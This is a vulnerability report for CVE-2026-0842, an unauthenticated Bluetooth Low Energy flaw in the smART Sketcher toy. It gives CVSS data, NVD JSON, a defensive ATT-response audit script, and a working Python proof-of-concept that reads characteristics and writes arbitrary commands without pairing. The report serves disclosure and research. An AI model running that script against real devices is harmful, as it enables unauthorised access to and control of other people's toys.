Security Vulnerability Report
CVE-2026-0842 CVSS 6.3 MEDIUM

Published: 2026-01-11 08:16:00
Last Modified: 2026-04-29 01:00:02

Description

A flaw has been found in Flycatcher Toys smART Sketcher up to and including version 2.0. It affects an unknown part of the Bluetooth Low Energy interface: the toy accepts BLE interaction from a client that has never paired or otherwise authenticated, which the NVD record classifies as CWE-287 (Improper Authentication) and CWE-306 (Missing Authentication for Critical Function). The CVSS attack vector is Adjacent; for a BLE-only interface that means an attacker within radio range of the toy rather than on an IP "local network", and no privileges or user interaction are required. An exploit script has been published (the GitHub link among the references in the NVD record) and may be used. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score
6.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
Subscores (exploitability / impact)
2.8 / 3.4
Other metric sets in the NVD record
CVSS 4.0 (secondary): 2.1 LOW, CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P
CVSS 2.0 (secondary): 5.8 MEDIUM, AV:A/AC:L/Au:N/C:P/I:P/A:P
The 4.0 vector carries the threat metric E:P (proof-of-concept exploit maturity), so 2.1 is a base-plus-threat (CVSS-BT) score, not a pure base score; that, together with the three Low impacts, is why it lands far below the 3.1 base score.

Configurations (Affected Products)

No CPE configuration data is present in the NVD record; the affected range below comes from the CVE description.

Flycatcher Toys smART Sketcher <= 2.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
"""
CVE-2026-0842 PoC - smART Sketcher BLE Authentication Bypass

This script demonstrates the missing authentication vulnerability in the
Flycatcher Toys smART Sketcher BLE interface: a client that has never paired
with the toy connects, enumerates the GATT database, and reads/writes
characteristics. Merely connecting proves nothing (any BLE peripheral accepts
an unpaired connection); the finding is that reads and writes succeed without
the device demanding pairing.

Note: This code is for educational and security research purposes only.
Requires bluepy (Linux/BlueZ): pip install bluepy
"""
import sys

from bluepy.btle import Peripheral, UUID, BTLEException


def connect_to_smart_sketcher(mac_address):
    """
    Connect to the smART Sketcher without pairing, enumerate services and
    characteristics, and attempt to read every readable characteristic.
    CVE-2026-0842: Missing authentication in BLE interface
    """
    try:
        print(f"[*] Connecting to smART Sketcher at {mac_address}...")
        # addrType: use 'public' instead if the device advertises a public address
        device = Peripheral(mac_address, addrType='random')
        print("[+] Connected (unpaired); probing characteristics...")
    except BTLEException as e:
        print(f"[-] Connection failed: {e}")
        return False

    unauthenticated_reads = 0
    try:
        print("\n[*] Enumerating BLE services...")
        for service in device.getServices():
            print(f"[Service] {service.uuid}: {service}")
            for characteristic in service.getCharacteristics():
                print(f"  [Char] {characteristic.uuid} - Properties: {characteristic.propertiesToString()}")
                # A hardened device answers an unpaired read with an ATT
                # "Insufficient Authentication/Encryption" error (bluepy raises BTLEException)
                if characteristic.supportsRead():
                    try:
                        value = characteristic.read()
                        unauthenticated_reads += 1
                        print(f"    [READ] {value}")
                    except BTLEException as e:
                        print(f"    [READ FAILED] {e}")
    finally:
        device.disconnect()

    if unauthenticated_reads:
        print(f"[!] CVE-2026-0842 confirmed: {unauthenticated_reads} characteristic(s) readable without authentication")
    return True


def send_unauthorized_command(mac_address, command):
    """
    Write a command to the device without pairing. The service/characteristic
    UUIDs below are placeholders (the real ones must be discovered with the
    enumeration above).
    """
    try:
        device = Peripheral(mac_address, addrType='random')
        service_uuid = UUID("0000fff0-0000-1000-8000-00805f9b34fb")
        char_uuid = UUID("0000fff1-0000-1000-8000-00805f9b34fb")
        service = device.getServiceByUUID(service_uuid)
        characteristic = service.getCharacteristics(char_uuid)[0]
        # withResponse=True so a rejected write raises instead of silently passing
        characteristic.write(command, withResponse=True)
        print(f"[+] Command sent without authorization: {command.hex()}")
        device.disconnect()
        return True
    except Exception as e:
        print(f"[-] Command failed: {e}")
        return False


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python smartsketch_poc.py <MAC_ADDRESS> [HEX_COMMAND]")
        print("Example: python smartsketch_poc.py AA:BB:CC:DD:EE:FF 0102")
        sys.exit(1)
    target_mac = sys.argv[1]
    connect_to_smart_sketcher(target_mac)
    if len(sys.argv) > 2:
        send_unauthorized_command(target_mac, bytes.fromhex(sys.argv[2]))
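Whether a GATT handle is protected is decided by the ATT layer: an unpaired Read or Write Request either succeeds (Read Response 0x0B / Write Response 0x13) or is refused with an Error Response (opcode 0x01) whose error code says why, 0x05 Insufficient Authentication, 0x0F Insufficient Encryption, 0x08 Insufficient Authorization, or 0x02/0x03 Read/Write Not Permitted. The following is an added example (not the report's PoC and not the referenced exploit) that classifies request/response pairs from a capture such as btmon or Wireshark into those outcomes, so that the description's "missing authentication" becomes a concrete, per-handle audit finding. The PDU layouts are from the Bluetooth Core Specification (Vol 3, Part F); the handles, values and exchanges in SAMPLE_EXCHANGES are constructed for illustration, not captured from a smART Sketcher.

```python
"""
Classify ATT request/response pairs to find GATT handles that accept
unpaired reads or writes (the CWE-306 condition). Added example; the sample
exchanges are constructed, not captured from a real device.
"""
import struct

# ATT opcodes (Bluetooth Core Spec, Vol 3 Part F, section 3.4)
ATT_ERROR_RSP = 0x01
ATT_READ_REQ = 0x0A
ATT_READ_RSP = 0x0B
ATT_WRITE_REQ = 0x12
ATT_WRITE_RSP = 0x13

# ATT error codes that matter for access control
ERR_READ_NOT_PERMITTED = 0x02
ERR_WRITE_NOT_PERMITTED = 0x03
ERR_INSUFFICIENT_AUTHENTICATION = 0x05
ERR_INSUFFICIENT_AUTHORIZATION = 0x08
ERR_INSUFFICIENT_ENCRYPTION = 0x0F

PROTECTED_ERRORS = {ERR_INSUFFICIENT_AUTHENTICATION,
                    ERR_INSUFFICIENT_ENCRYPTION,
                    ERR_INSUFFICIENT_AUTHORIZATION}
DENIED_ERRORS = {ERR_READ_NOT_PERMITTED, ERR_WRITE_NOT_PERMITTED}


def parse_request(pdu: bytes):
    """Return (opcode, handle) for a Read Request or Write Request PDU."""
    if len(pdu) < 3 or pdu[0] not in (ATT_READ_REQ, ATT_WRITE_REQ):
        raise ValueError(f"not a Read/Write Request: {pdu.hex()}")
    (handle,) = struct.unpack_from("<H", pdu, 1)   # handle is little-endian
    return pdu[0], handle


def classify(request: bytes, response: bytes) -> str:
    """
    Classify the server's answer to an unpaired request:
      'UNAUTHENTICATED' - request succeeded with no pairing (vulnerable)
      'PROTECTED'       - server demanded authentication/encryption/authorization
      'DENIED'          - operation not permitted on this handle at all
      'OTHER_ERROR'     - any other ATT error
    """
    req_op, req_handle = parse_request(request)
    if response[0] == ATT_ERROR_RSP:
        if len(response) != 5:
            raise ValueError("malformed Error Response")
        # Error Response: opcode(1) | request opcode(1) | handle(2 LE) | error code(1)
        err_req_op, err_handle, err_code = struct.unpack_from("<BHB", response, 1)
        if err_req_op != req_op or err_handle != req_handle:
            raise ValueError("Error Response does not match the request")
        if err_code in PROTECTED_ERRORS:
            return "PROTECTED"
        if err_code in DENIED_ERRORS:
            return "DENIED"
        return "OTHER_ERROR"
    expected = ATT_READ_RSP if req_op == ATT_READ_REQ else ATT_WRITE_RSP
    if response[0] == expected:
        return "UNAUTHENTICATED"
    raise ValueError(f"unexpected response opcode 0x{response[0]:02x}")


def audit(exchanges):
    """Return [(handle, 'read'|'write'), ...] for every unpaired access that succeeded."""
    findings = []
    for req, rsp in exchanges:
        op, handle = parse_request(req)
        if classify(req, rsp) == "UNAUTHENTICATED":
            findings.append((handle, "read" if op == ATT_READ_REQ else "write"))
    return findings


def _err(req_op, handle, code):
    return struct.pack("<BBHB", ATT_ERROR_RSP, req_op, handle, code)


# Constructed exchanges (illustrative, not a capture from the toy)
SAMPLE_EXCHANGES = [
    # Write Request to 0x0010 with value 01 02 -> Write Response: accepted unpaired
    (bytes([ATT_WRITE_REQ]) + struct.pack("<H", 0x0010) + b"\x01\x02", bytes([ATT_WRITE_RSP])),
    # Read Request 0x0012 -> Read Response carrying 3 bytes: readable unpaired
    (bytes([ATT_READ_REQ]) + struct.pack("<H", 0x0012), bytes([ATT_READ_RSP]) + b"\x00\x2a\x10"),
    # Write Request 0x0020 -> Error 0x05 Insufficient Authentication: properly protected
    (bytes([ATT_WRITE_REQ]) + struct.pack("<H", 0x0020) + b"\xff", _err(ATT_WRITE_REQ, 0x0020, ERR_INSUFFICIENT_AUTHENTICATION)),
    # Read Request 0x0022 -> Error 0x02 Read Not Permitted: not readable by anyone
    (bytes([ATT_READ_REQ]) + struct.pack("<H", 0x0022), _err(ATT_READ_REQ, 0x0022, ERR_READ_NOT_PERMITTED)),
]

if __name__ == "__main__":
    for handle, op in audit(SAMPLE_EXCHANGES):
        print(f"handle 0x{handle:04x}: {op} accepted without pairing (CWE-306)")
```

Two caveats when reading the results. An Insufficient Encryption (0x0F) answer only proves the device wants an encrypted link; if it pairs with Just Works, that link has no MITM protection, so "PROTECTED" there is weaker than an Insufficient Authentication (0x05) answer from a device that insists on authenticated pairing. And bluepy, as used in the PoC above, does not expose raw ATT PDUs; the classifier is meant for a btmon/Wireshark capture of the PoC session or for a raw L2CAP ATT client.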

References

https://github.com/davidrxchester/smart-sketcher-upload/blob/main/smartsketch-upload.py (published exploit script cited by the record)
https://vuldb.com/?ctiid.340442
https://vuldb.com/?id.340442
https://vuldb.com/?submit.729134

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-0842", "sourceIdentifier": "[email protected]", "published": "2026-01-11T08:16:00.150", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw has been found in Flycatcher Toys smART Sketcher up to 2.0. This affects an unknown part of the component Bluetooth Low Energy Interface. This manipulation causes missing authentication. The attack can only be done within the local network. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way."}, {"lang": "es", "value": "Se ha encontrado un fallo en Flycatcher Toys smART Sketcher hasta la versión 2.0. Esto afecta a una parte desconocida del componente Interfaz Bluetooth de Baja Energía. Esta manipulación provoca ausencia de autenticación. El ataque solo puede realizarse dentro de la red local. El exploit ha sido publicado y puede ser utilizado. El proveedor fue contactado tempranamente sobre esta divulgación, pero no respondió de ninguna manera."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "ADJACENT", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", 
"modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:A/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 5.8, "accessVector": "ADJACENT_NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 6.5, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-287"}, {"lang": "en", "value": "CWE-306"}]}], "references": [{"url": "https://github.com/davidrxchester/smart-sketcher-upload/blob/main/smartsketch-upload.py", 
"source": "[email protected]"}, {"url": "https://vuldb.com/?ctiid.340442", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.340442", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.729134", "source": "[email protected]"}]}}